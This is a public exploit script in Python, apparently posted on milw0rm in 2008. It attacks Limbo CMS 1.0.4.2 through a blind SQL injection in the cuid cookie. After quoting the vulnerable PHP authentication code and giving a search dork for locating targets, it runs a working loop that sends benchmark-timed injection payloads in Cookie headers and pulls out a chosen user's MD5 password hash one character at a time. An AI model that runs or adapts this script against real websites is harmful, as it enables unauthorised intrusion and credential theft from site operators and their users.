128 lines
No EOL
6.6 KiB
Python
Executable file
128 lines
No EOL
6.6 KiB
Python
Executable file
#!/usr/bin/python
|
|
#=================================================================================================#
|
|
# ____ __________ __ ____ __ #
|
|
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
|
|
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
|
|
# | | | \ | |/ \ \___| | /_____/ | || | #
|
|
# |___|___| /\__| /______ /\___ >__| |___||__| #
|
|
# \/\______| \/ \/ #
|
|
#=================================================================================================#
|
|
# This is a Public Exploit. #
|
|
# Date: 08/02/2008 [dd,mm,yyyy] #
|
|
# #
|
|
#=================================================================================================#
|
|
# Limbo 1.0.4.2 And Probably Lower Blind Sql Injection Exploit Benchmark Method #
|
|
# #
|
|
# Vendor: http://www.limbo-cms.com #
|
|
# Severity: Highest #
|
|
# Author: The:Paradox #
|
|
#=================================================================================================#
|
|
# Proud To Be Italian. #
|
|
#=================================================================================================#
|
|
"""
|
|
Related Codes:
|
|
class_auth.php; line 92:
|
|
|
|
function Auth()
|
|
{
|
|
if(isset($_SESSION['uid']) && $_SESSION['uid']!='')
|
|
{
|
|
$this->id=$_SESSION['uid'];
|
|
$this->initlogin();
|
|
return;
|
|
}
|
|
//cokkie
|
|
|
|
if(isset($_COOKIE['cuid']) && isset($_COOKIE['cusername']) && isset($_COOKIE['cpassword']))
|
|
{
|
|
global $conn,$lm_rand;
|
|
$row=$conn->GetRow("SELECT * FROM #__users WHERE id=".$_COOKIE['cuid']);
|
|
if($_COOKIE['cusername']==$row['username'] && $_COOKIE['cpassword']==md5($lm_rand.$row['password']) ) {
|
|
$this->id=$_COOKIE['cuid'];
|
|
$this->initlogin();
|
|
}
|
|
}
|
|
}
|
|
|
|
"""
|
|
#=================================================================================================#
|
|
# Proof Of Concept / Bug Explanation: #
|
|
# #
|
|
# Cuid cookie isn't propelly checked. Blind Sql Injection Vulnerability. In this exploit I'll use #
|
|
# benchmark method. #
|
|
# Additionally database prefix isn't needed, 'cause the coder automatically replaces "#__" with #
|
|
# the prefix in GetRow Function (is a REAL bad practice) . #
|
|
# Limbo allows also an installation without sql database (Flat). I'm working on it. #
|
|
# This exploit cannot work on that type of installation. #
|
|
#=================================================================================================#
|
|
# Google Dork=> Site powered By Limbo CMS #
|
|
#=================================================================================================#
|
|
# Use this at your own risk. You are responsible for your own deeds. #
|
|
#=================================================================================================#
|
|
# Python Exploit Starts #
|
|
#=================================================================================================#
|
|
|
|
import httplib, sys, time
|
|
print "\n#=========================================================#"
|
|
print " Limbo CMS 1.0.4.2 And Probably Lower "
|
|
print " Blind Sql Injection Vulnerability "
|
|
print " Benchmark Method "
|
|
print " "
|
|
print " Discovered By The:Paradox "
|
|
print " "
|
|
print " Usage: "
|
|
print " %s [Target] [Path] [User_id] " % (sys.argv[0])
|
|
print " "
|
|
print " Example: "
|
|
print " %s 127.0.0.1 /limbo/ 1 " % (sys.argv[0])
|
|
print " %s www.host.com / 1 " % (sys.argv[0])
|
|
print " "
|
|
print " "
|
|
print "#=========================================================#\n"
|
|
if len(sys.argv)<=3: sys.exit()
|
|
else: print "[.]Exploit Starting."
|
|
|
|
target = sys.argv[1]
|
|
path = sys.argv[2]
|
|
user_id = sys.argv[3]
|
|
|
|
benchmark = "200000000" #Set This One
|
|
vtime = 6 #Set This One
|
|
port = "80"
|
|
|
|
j=1
|
|
h4sh = ""
|
|
md5tuple = []
|
|
|
|
for k in range(48,58): # 48->57 and 97->102
|
|
md5tuple.append(k)
|
|
for k in range(97,103):
|
|
md5tuple.append(k)
|
|
md5tuple.append('END')
|
|
#Query will Result like this one ===> SELECT * FROM #__users WHERE id=(SELECT/**/IF((ASCII(SUBSTRING(password,1,1))=50),benchmark(30000000,CHAR(0)),null)/**/FROM/**/#__users/**/WHERE/**/id=1)
|
|
print "[.]Blind Sql Injection Starts.\n\nHash:"
|
|
while j <= 32:
|
|
for i in md5tuple:
|
|
if i == 'END': sys.exit('[-]Exploit Failed.\n')
|
|
|
|
start = time.time()
|
|
conn = httplib.HTTPConnection(target,port)
|
|
|
|
|
|
conn.request("GET", path + "admin.php", {}, {"Accept": "text/plain","Cookie": "cpassword=1; cusername=1; cuid=(SELECT/**/IF((ASCII(SUBSTRING(password," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),null)/**/FROM/**/#__users/**/WHERE/**/id="+user_id+");"})
|
|
response = conn.getresponse()
|
|
read = response.read()
|
|
|
|
if response.status == 404: sys.exit('[-]Error 404. Not Found.')
|
|
now = time.time()
|
|
|
|
if now - start > vtime:
|
|
sys.stdout.write(chr(i))
|
|
sys.stdout.flush()
|
|
h4sh += chr(i)
|
|
j += 1
|
|
break;
|
|
|
|
print "\n\n[+]All Done.\n-=Paradox Got This One=-"
|
|
|
|
# milw0rm.com [2008-02-09] |